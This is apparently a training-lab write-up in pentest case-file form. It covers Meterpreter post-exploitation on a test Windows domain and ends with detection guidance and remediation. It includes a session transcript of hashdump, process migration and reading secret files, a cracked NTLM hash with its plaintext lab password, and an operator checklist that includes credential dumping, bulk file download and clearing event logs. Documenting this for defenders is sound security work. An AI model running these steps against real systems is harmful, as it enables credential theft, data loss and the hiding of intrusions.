Case file

Meterpreter post-ex: domain enum, hash crack, and secret file recovery

Foundations post-exploitation engagement: in-memory Meterpreter on ACME-TEST/FLASH domain; enumerated user share speedster; dumped and cracked jchambers NTLM to Trustno1; located secrets.txt and realsecret.txt artifacts.

Foundations24 minMeterpreter · Post-Exploitation · Credential Access · Windows
  • Meterpreter ran in-memory under a trusted process; sysinfo showed ACME-TEST / FLASH; speedster share; jchambers Trustno1; Twitter and Flash secrets recovered from disk paths.

  • sysinfo/shares; cracked jchambers; cat secrets.txt and realsecret.txt.

01

Engagement summary

Meterpreter ran in-memory under a trusted process; sysinfo showed ACME-TEST / FLASH; speedster share; jchambers Trustno1; Twitter and Flash secrets recovered from disk paths.

METASPLOIT: METERPRETER focused on post-exploitation tradecraft after a successful session. Meterpreter’s value for the client briefing: in-memory agent (no meterpreter.exe on disk), encrypted C2, process migration into trusted binaries (e.g. spoolsv.exe) to reduce AV file-scan hits. From the session: computer name ACME-TEST, domain FLASH, user-created share speedster. Credential access recovered jchambers NTLM 69596c7aa1e8daee17f8e78870e25a5c → cleartext Trustno1. File search located c:\Program Files (x86)\Windows Multimedia Platform\secrets.txt (Twitter password KDSvbsw3849!) and c:\inetpub\wwwroot\realsecret.txt (“The Flash is the fastest man alive”). Operator workflow: getuid/sysinfo → enum shares → hashdump/crack → search/cat sensitive paths — documented for blue-team detection mapping (process injection, LSASS access, unusual share creation).

Business impact

In-memory C2 under SYSTEM-trusted processes defeats naive file AV. Weak domain passwords (Trustno1) and plaintext secrets in Program Files / inetpub turn one host into credential and data loss. Detect cross-process injection, unexpected shares, and LSASS reads — not only known malware names.

02

Session enum, hash crack, file recovery

sysinfo/shares; cracked jchambers; cat secrets.txt and realsecret.txt.

OPERATOR · METERPRETER

meterpreter > sysinfo

Computer: ACME-TEST Domain: FLASH

meterpreter > getpid

Current pid: 1304 (hosted in spoolsv.exe)

meterpreter > # enum shares → speedster (user-created)

meterpreter > hashdump

jchambers:...:69596c7aa1e8daee17f8e78870e25a5c

savvy@lab:~$ # offline crack → Trustno1

meterpreter > cat "c:\Program Files (x86)\Windows Multimedia Platform\secrets.txt"

My Twitter password is KDSvbsw3849!

meterpreter > cat "c:\inetpub\wwwroot\realsecret.txt"

The Flash is the fastest man alive

POST-EX CHECKLIST

meterpreter-ops.txt

getuid / sysinfo / getpid / ps
migrate <trusted-pid>
hashdump | kiwi_cmd
enum shares / net share
search -f *.txt / secrets
download sensitive paths
clearev only if ROE allows

Remediation

Enforce LAPS/unique local admin passwords; ban Trustno1-class secrets. Keep credentials out of web roots and Program Files. EDR: alert on Meterpreter-like API sequences and unexpected SMB share creation. Rotate any account whose hash or cleartext left the estate.